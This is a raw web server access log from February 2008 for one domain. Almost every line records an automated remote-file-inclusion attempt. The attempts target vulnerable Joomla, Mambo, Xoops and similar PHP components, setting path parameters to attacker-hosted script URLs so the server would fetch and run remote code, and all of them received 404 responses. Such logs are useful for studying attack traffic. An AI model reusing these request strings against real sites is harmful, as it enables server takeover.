208.116.41.19 - - [26/Feb/2008:08:24:38 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:25:27 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:25:27 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:08:25:54 -0800] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:08:25:54 -0800] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:25:59 -0800] "GET /logs/access_071228.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:25:59 -0800] "GET /index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:25:59 -0800] "GET /logs/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.167.66.230 - - [26/Feb/2008:08:26:19 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.117.237.134 - - [26/Feb/2008:08:26:51 -0800] "GET ///config.php?inc_dir=http://www.zuuniimedee.mn//modules/My_eGallery/image/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:27:56 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:27:56 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:27:57 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:08:28:39 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:08:28:39 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:28:39 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:08:28:39 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:29:17 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:29:17 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:29:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:30:23 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:30:24 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.126.142.130 - - [26/Feb/2008:08:30:38 -0800] "GET //includes/kb_constants.php?module_root_path=http://www.packet.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.126.142.130 - - [26/Feb/2008:08:30:38 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://www.packet.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:30:47 -0800] "GET /modules/xfsection/modify.php?dir_module=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:30:47 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:30:47 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.67.202.19 - - [26/Feb/2008:08:31:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ppunet.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:08:31:04 -0800] "GET /logs/access_080122.log/include.php?path[docroot]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:08:31:04 -0800] "GET /logs/include.php?path[docroot]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:31:04 -0800] "GET /logs/access_071228.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:31:08 -0800] "GET /index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:31:08 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:31:12 -0800] "GET /logs/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:08:31:47 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:08:31:47 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:04 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:04 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:04 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:32:05 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.167.66.230 - - [26/Feb/2008:08:32:12 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.167.66.230 - - [26/Feb/2008:08:32:13 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.167.66.230 - - [26/Feb/2008:08:32:13 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.63.220.22 - - [26/Feb/2008:08:33:52 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.63.220.22 - - [26/Feb/2008:08:33:53 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:34:31 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:34:41 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:34:41 -0800] "GET //Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:34:41 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.237.134 - - [26/Feb/2008:08:34:44 -0800] "GET /logs/access_080201.log///config.php?inc_dir=http://www.zuuniimedee.mn//modules/My_eGallery/image/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.237.134 - - [26/Feb/2008:08:34:45 -0800] "GET ///config.php?inc_dir=http://www.zuuniimedee.mn//modules/My_eGallery/image/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.237.134 - - [26/Feb/2008:08:34:45 -0800] "GET /logs///config.php?inc_dir=http://www.zuuniimedee.mn//modules/My_eGallery/image/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.29.7.12 - - [26/Feb/2008:08:35:56 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "holmes/3.12.2 (http://morfeo.centrum.cz/bot)" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:08:36:02 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:08:36:06 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:36:22 -0800] "GET /logs/access_080122.log/%3CDorty%3Ehttp://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:36:22 -0800] "GET /%3CDorty%3Ehttp://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:36:23 -0800] "GET /logs/%3CDorty%3Ehttp://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.59.65 - - [26/Feb/2008:08:36:26 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/cache/cache_c21f969b5f03d33d43e04f8f136e7682_3f46aa4070409dc6745ea50a9859f388/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:36:33 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:36:50 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:08:37:32 -0800] "GET /logs/access.log/include.php?path[docroot]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:37:36 -0800] "GET /logs/access.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:08:38:08 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:08:38:08 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:08:38:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:38:25 -0800] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:08:38:26 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:38:26 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:08:38:27 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:38:27 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:08:38:28 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:38:32 -0800] "GET /logs/access_080119.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:38:32 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:38:33 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:39:30 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:39:31 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:39:31 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:40:14 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
147.202.41.39 - - [26/Feb/2008:08:40:14 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:40:40 -0800] "GET /logs/access_080117.log/%3CDorty%3Ehttp://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:41:25 -0800] "GET /logs/access_071228.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:41:25 -0800] "GET /index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:41:25 -0800] "GET /logs/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:41:52 -0800] "GET /logs/access_080131.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:08:42:26 -0800] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:08:42:26 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:42:33 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:42:33 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:42:33 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:49 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:49 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:49 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:42:50 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:42:51 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:42:51 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:59 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:59 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:08:42:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:11 -0800] "GET /logs/access.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:16 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:08:43:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
